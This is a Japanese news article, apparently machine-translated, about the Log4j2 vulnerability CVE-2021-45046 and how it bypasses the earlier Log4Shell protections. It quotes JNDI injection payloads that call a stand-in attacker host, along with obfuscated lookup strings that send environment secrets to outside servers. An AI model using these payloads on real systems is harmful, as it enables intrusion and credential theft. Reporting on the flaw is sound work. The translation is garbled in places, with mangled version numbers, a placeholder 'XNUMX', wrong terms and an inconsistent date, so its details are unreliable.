彼らは、悪意のあるコードの実行を可能にする別の脆弱性Log4j2を特定しました

Darkcrizt

4分

ログ4j

最近、それがあったというニュースが発表されました 別の脆弱性を特定 JNDIルックアップの実装 Log4j2ライブラリ内 (CVE-2021-45046)これは、バージョン2.15で追加された修正にもかかわらず、「log4j2.noFormatMsgLookup」保護設定の使用に関係なく発生します。

問題 主に古いバージョンのLog4j2では特に危険です。、「noFormatMsgLookup」フラグで保護されています。これにより、過去の脆弱性(Log4Shell、CVE-2021-44228)に対する保護をバイパスできるため、サーバー上でコードを実行できます。

のために バージョン2.15ユーザーの場合、操作は条件の作成に制限されます 利用可能なリソースの枯渇によるアプリケーションの異常終了。

脆弱性 コンテキスト検索を使用するシステムにのみ影響します。 $ {ctx:loginId}など、または登録用の%X、%mdc、%MDCなどのスレッドコンテキストマップ(MDC)テンプレート。

この操作は、アプリケーションでコンテキストクエリまたはMDCテンプレートを使用するときに、JNDI置換を含むデータをレジストリに送信する条件を作成することになります。これにより、レジストリへの出力をフォーマットするためのルールが決定されます。

たくさん LunaSecの研究者は 4より前のLog2.15jバージョンよりも この脆弱性は、Log4Shell攻撃の新しいベクトルとして使用できます、フラグが保護用に設定されているかどうかに関係なく、外部データを含むレジストリに投稿するときにThreadContext式が使用されると、コードが実行されます。 「NoMsgFormatLookups」または「%m {nolookups}」テンプレート。

保護バイパスは、直接置換 "$ {jndi:ldap://example.com/a}"の代わりに、この式がチェックアウトをフォーマットするためのルールで使用される中間変数の値に置き換えられるという事実に還元されます。登録簿。

たとえば、レジ​​ストリへの送信時にコンテキストリクエスト$ {ctx:apiversion}を使用する場合、値に「$ {jndi:ldap://attacker.com/a}」というデータを代入することで攻撃を実行できます。偏差変数に書き込まれます。

バージョンLog4j2.15では、この脆弱性を使用してDoS攻撃を実行できます 出力フォーマットパターン処理をループするThreadContextに値を渡すとき。

発生した問題の解決を試みることができるようにするため アップデート2.16および2.12.2がリリースされました 脆弱性をブロックします。 Log4j 2.16ブランチでは、バージョン2.15で実装された修正と、「localhost」へのJNDI LDAP要求のバインドに加えて、デフォルトでJNDI機能が完全に無効になり、メッセージ置換テンプレートのサポートが削除されました。

回避策として、クラスパスからJndiLookupクラスを削除することをお勧めします(たとえば、「zip -q -dlog4j-core-*。jarorg / apache / logging / log4j / core / lookup / JndiLookup.class」)。

として さまざまなプロジェクトによって取られたアクション:

nginxnjsモジュールに基づいて、HTTPヘッダー、URI、およびPOST要求の本文でのJNDI式の送信をブロックするスクリプトが用意されています。 スクリプトをフロントエンドサーバーで使用して、バックエンドを保護できます.
HAProxyの場合、CVE-2021-44228の操作をブロックするための設定ルールが提供されています。

暗号通貨マイニング用のボットネットの形成を狙った以前に特定された攻撃に加えて、Log4J 2の脆弱性を悪用して、ディスクの内容を暗号化し、復号化のために身代金を要求する悪意のあるランサムウェアを拡散させました。

チェックポイントは約60のバリアントを識別しました 攻撃に使用されるさまざまな種類のエクスプロイト。

CloudFlareは、Log4jの脆弱性の兆候をテストしようとしていると報告しました それらは1月8日、つまり問題の公開の9日前に特定されました。 この脆弱性を悪用する最初の試みは、情報が開示されてからわずかXNUMX分後に記録されました。 CloudFlareレポートでは、「$ {env:FOO:-j} ndi:$ {lower:L} give $ {lower:P}」などの置換を使用して、マスク「jndi:ldap」を省略したり、 $ {env}攻撃式は、環境変数に格納されているパスワードとアクセスキーに関する情報を外部サーバーに転送し、$ {sys}式は、システムに関する情報を収集します。

最後に あなたがそれについてもっと知りたいなら あなたはチェックすることができます 次のリンク。


コメントを残す

あなたのメールアドレスが公開されることはありません。 必須フィールドには付いています *

*

*

  1. データの責任者:AB Internet Networks 2008 SL
  2. データの目的:SPAMの制御、コメント管理。
  3. 正当化:あなたの同意
  4. データの伝達:法的義務がある場合を除き、データが第三者に伝達されることはありません。
  5. データストレージ:Occentus Networks(EU)がホストするデータベース
  6. 権利:いつでも情報を制限、回復、削除できます。